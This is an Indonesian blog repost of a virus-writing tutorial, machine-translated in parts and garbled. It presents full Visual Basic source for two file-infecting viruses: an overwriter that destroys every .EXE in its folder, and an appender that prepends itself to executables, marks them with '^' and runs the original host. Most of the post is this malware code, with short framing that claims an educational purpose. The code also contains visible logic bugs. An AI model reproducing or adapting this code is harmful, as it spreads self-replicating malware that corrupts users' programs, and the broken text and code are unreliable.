bagian +1
Intro untuk virus VB
Satu-satunya alasan mengapa saya bahkan mulai writting virus VB adalah bahwa saya adalah seorang programmer makro dan saya ingin mencoba infeksi exe. Ini adalah kontak pertama saya dengan infeksi exe. virus VB memiliki satu aliran i g b. Itu adalah ukuran mereka. Seperti Anda semua tahu mereka besar dan itu adalah sesuatu yang kita tidak inginkan dalam virus itu? Untuk mengatasi masalah ini kita dapat menggunakan variabel untuk string seringkali digunakan untuk mempersingkat kode tersebut tetapi tidak banyak membantu sehingga kami harus menerima ukuran sebagai arus dan mencoba menemukan banyak trik untuk membuatnya sekeras mungkin mendeteksi. Permasalahan lain adalah virus VB adalah bahwa mereka perlu dll untuk menjalankan () tidak! Sesuatu yang kita inginkan untuk virus. Selain itu sebabnya aku mulai belajar asm. virus VB adalah untuk tujuan pendidikan saja.
Anda dapat menggunakan enkripsi untuk VB virus juga. Saya telah menggunakan enkripsi karakter (digunakan dalam virus makro, pertama kali digunakan oleh VicodinES) dan bekerja dengan sukses. Sekarang saya mencoba untuk menemukan metode lain untuk enkripsi khususnya untuk virus VB dan Anda akan melihat hasilnya dalam isu-isu kemudian dari seri ini.
Untuk setiap komentar dan / atau saran e-mail saya di [PAIN] @ cypria.com
Dari [PAIN] (secara resmi dikenal sebagai PhreakX
programnya
Option Explicit
Dim myarray() As Byte
Dim victim As String
Const mysize As Integer = 11776
Private Sub Form_Load()
On Error Resume Next
Dim Free
Free = FreeFile
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
ReDim myarray(mysize)
Get #1, 1, myarray
Close #Free
victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""
Open App.Path & "\" & victim For Binary Access Write As #Free
Put #1, , myarray
Put #1, , mysize
Close #Free
victim = Dir()
Wend
End
End Sub
Ini dia ... karena Anda dapat melihat overwritters mati mudah untuk menulis. Di edisi berikutnya saya akan membahas menambahkan virus. Untuk komentar dan / atau pertanyaan e-mail saya di [PAIN] @ cypria.com
bagian # 3
EXE Appenders
Sekarang kita sampai hal yang nyata ... EXE dengan menambahkan virus. Ini adalah virus menambahkan sederhana tidak dienkripsi tanpa muatan apapun.
programnya
Option Explicit
Private victim As String
Private myarray() As Byte
Private varray As Byte
Private length As Long
Private chck As String
Const size As Integer = 18432
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Dim I As Long
Dim Free
Free = FreeFile
On Error GoTo Fin
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free
victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""
' If the victim file, has the same directory and name as the file
' that is running - skip the next part
If LCase(App.Path & "\" & App.EXEName & ".exe") _
<> LCase(App.Path & "\" & App.EXEName & ".exe") Then
Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free)) ' Sets buffer up for the file data
Get #1, 1, varray ' Copy th file data into a variable
Close #Free
chck = Mid(varray, Len(varray)) ' Store the last character in the
' victim file in CheckX
If LCase(chck) <> "^" Then ' if the character = X then the file has
' already been infected, if not continue
Open victim For Binary Access Write As #Free
Put #Free, 1, myarray ' Place our code in the front of the file
Put #Free, size, varray ' Follow it immediatley by the victims code
Put #Free, LOF(Free) + 1, "^" 'Place an X at the end to show it's been
'infected
Close #Free 'Thats how this virus got it's name!
End If
Else
End If
Victim = Dir() ' Find the next file to infect
Wend ' Go back to the start
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size) ' Store the length of the current file minus
' the virus file size in the variable
If Length > 0 Then ' if it's more than 0, the file is infected,
' if not, this is the raw virus file
myarray = Space(length) ' Create buffer in variable, for the size of
' the file
Get #Free, size, myarray ' Get the old host data from out of this file
Close #Free
Open App.Path & "\" & App.EXEName & ".tut" For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #Free
idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
' Run the old host code
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
' Get it running application code number
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE ' Wait untill the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop
On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut" ' Delete the old host code
Else
Close #Free
End If
End
Fin:
End Sub
i. biasanya virus dipakai cracker untuk hal-hal yang tidak benar,kadang juga hacker untuk mencari kelemahan suatu program,virus-virus diatas masih standar karena tidak memanipulasi registri seperti autorun.inf yang hampir di semua kompi terdapat ini.itu menjadi merepotkan.
dapat dari:vx.netlux.org/lib/static/vdat/tuvbpain.htm
![[Valid RSS]](valid-rss-rogers.png "Validate my RSS feed")
Posting Komentar